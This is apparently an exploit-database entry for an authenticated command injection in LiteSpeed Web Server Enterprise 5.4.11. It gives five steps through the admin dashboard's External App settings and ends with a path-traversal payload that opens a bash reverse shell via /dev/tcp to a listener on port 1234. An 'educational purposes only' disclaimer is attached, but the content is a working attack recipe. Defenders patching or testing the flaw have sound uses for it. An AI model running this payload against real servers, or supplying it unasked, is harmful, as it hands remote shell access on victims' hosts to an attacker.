Litespeed web server enterprise 5.4.11 command injection (authenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-02-05 |
Type : webapps |
Platform : php
This exploit / vulnerability Litespeed web server enterprise 5.4.11 command injection (authenticated) is for educational purposes only and if it is used you will do on your own risk!
Step 1: Log in to the dashboard using the Administrator account.
Step 2 : Access Server Configuration > Server > External App > Edit
Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value
Step 5: Graceful Restart